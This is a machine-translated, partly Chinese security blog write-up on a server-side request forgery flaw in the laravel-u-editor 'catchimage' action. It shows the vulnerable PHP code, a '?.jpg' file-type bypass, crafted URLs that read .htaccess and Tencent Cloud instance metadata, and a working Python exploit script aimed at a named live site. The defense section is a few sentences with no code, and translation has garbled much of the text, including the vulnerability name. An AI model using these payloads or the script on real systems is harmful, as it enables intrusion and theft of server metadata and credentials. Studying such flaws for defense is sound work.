*** f vulnerability testing practices and defense applications
Overview
The test site for the company's internal testing, test out a number of common xss, file upload, order logic vulnerabilities. But here only a f loophole to make learning, which is a big brother found from the code, I came to learn about the same time to sum up. This is a summary of the reason, perhaps because some of the knowledge and skills learned more from this flaw in it! At the same time deepen understanding of f!
Details Vulnerability
Vulnerability principle:
F (Server-Side Request Forgery: server-side request forgery) is a kind of constructors form a security breach that initiated the request by the server. In general, F target is an internal system from the external network can not be accessed. The reason is mostly due to the formation of F server provides the ability to get data from other servers and applications do not have filters and restrictions on the destination address. Such as access to web text content from the specified URL address load the specified address pictures, downloads and more. (Summary from the network)
has a lot on these principles networks, not too much to explain. I would like to explain in detail about the process of vulnerability caused and during use.
Found loopholes
Site quoted an editor of the project laravel-u-editor on github. UEditor is to develop a WYSIWYG rich text by the Baidu web front-end R & D web editor.
code show as below:
public function server(Request $request)
{
$config = config('UEditorUpload.upload');
$action = $request->get('action');
switch ($action) {
case 'config':
$result = $config;
break;
case 'uploadimage':
$upConfig = array(
"pathFormat" => $config['imagePathFormat'],
"maxSize" => $config['imageMaxSize'],
"allowFiles" => $config['imageAllowFiles'],
'fieldName' => $config['imageFieldName'],
);
$result = with(new UploadFile($upConfig, $request))->upload();
break;
......
case 'catchimage':
$upConfig = array(
"pathFormat" => $config['catcherPathFormat'],
"maxSize" => $config['catcherMaxSize'],
"allowFiles" => $config['catcherAllowFiles'],
"oriName" => "remote.png",
'fieldName' => $config['catcherFieldName'],
);
$sources = $request->get($upConfig['fieldName']);
$list = [];
foreach ($sources as $imgUrl) {
$upConfig['imgUrl'] = $imgUrl;
$info = with(new UploadCatch($upConfig, $request))->upload();
array_push($list, array(
"state" => $info["state"],
"url" => $info["url"],
"size" => $info["size"],
"title" => htmlspecialchars($info["title"]),
"original" => htmlspecialchars($info["original"]),
"source" => htmlspecialchars($imgUrl)
));
}
$result = [
'state' => count($list) ? 'SUCCESS' : 'ERROR',
'list' => $list
];
break;
}
By code audit found that one of the parameters $ sources can be controlled entirely by themselves.
Sources request- = $ $> GET ($ upConfig [ 'the fieldName']);
$ direct access to the value of the source parameter passed in the request source parameter.
Further, when determining the file type transmitted over $ $ Sources for imgUrl value may be bypassed. code show as below
$fileType = strtolower(strrchr($imgUrl, '.'));
检测url中“.”后面的后缀即为文件类型,同时判断是不是allowfiles中列举文件类型。所以,完全可以通过?.jpg绕过这个文件类型的判断,去读取一些文件的内容。
漏洞的利用
简单访问一下.htaccess文件
构造请求url:
https://*/laravel-u-editor-server/server?action=catchimage&source[]=https://*/.htaccess?.jpg
先尝试访问
https://*/laravel-u-editor-server/server?action=catchimage&source[]=https://*/.htaccess
很明显访问不了内容。接下来访问我们构造的url
然后访问得到的图片地址。这是便能够看到文件的内容
切记要使用源码的形式观看。
利用小技巧:
因为网站是使用腾讯云搭建的,如果网站存在***f漏洞,完全可以通过腾讯云给的服务器元数据的接口,获得服务器的很多信息。元数据接口信息文档内容:
https://cloud.tencent.com/document/product/213/4934#.E6.9F.A5.E8.AF.A2.E5.AE.9E.E4.BE.8B.E5.85.83.E6.95.B0.E6.8D.AE
Look at all categories of metadata
https: // * / laravel-u
-editor-server / server action = catchimage & source [] = http:?? //Metadata.tencentyun.com/latest/meta-data/ .jpg then visit The map's address:
This is all metadata information can be listed. We can try to get at the internal IP address
For further information, script:
#!/usr/bin/python3
#coding=utf-8
import requests
import sys
'''
***f漏洞利用脚本
时间:2019-12-24
作者:yaunsky
作用:通过腾讯云接口,获取元数据
'''
#获取元数据并输出
def imgRequests():
#获取腾讯云接口的url
source = sys.argv[1]
imgurl = "https://beta.4hou.com/laravel-u-editor-server/server?action=catchimage&source[]="+source+"?.jpg"
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0"}
req = requests.get(url=imgurl,headers=headers)
print(jpgRequests(req))
#获取jpg文件的url
def jpgRequests(req):
jpgJson = req.json()
jpgInfo = requests.get(jpgJson['list'][0]['url'])
return jpgInfo.text
def main():
imgRequests()
if __name__ == "__main__":
main()
Obtain a user name server
to obtain the server public key
acquiring real ip
Defense vulnerabilities
The method used is to set the url white list. Restrict access to imgurl address. At the same time modify the file type of authentication source.
Modify the code:
simple example
url defense after the previous visit.
Epilogue
Today, most cloud services for small and medium enterprises are using, if you encounter *** f, might given api interface to obtain sensitive information by some effective through this loophole. If you are a business user at the same time we must guard against their own website, set up a whitelist, do not let the outlaws drilled loopholes!
Article summary only do learning and exchange! ! !
If the "*" sign indicates a platform filter, generally indicated shentou and gongji! ! ! !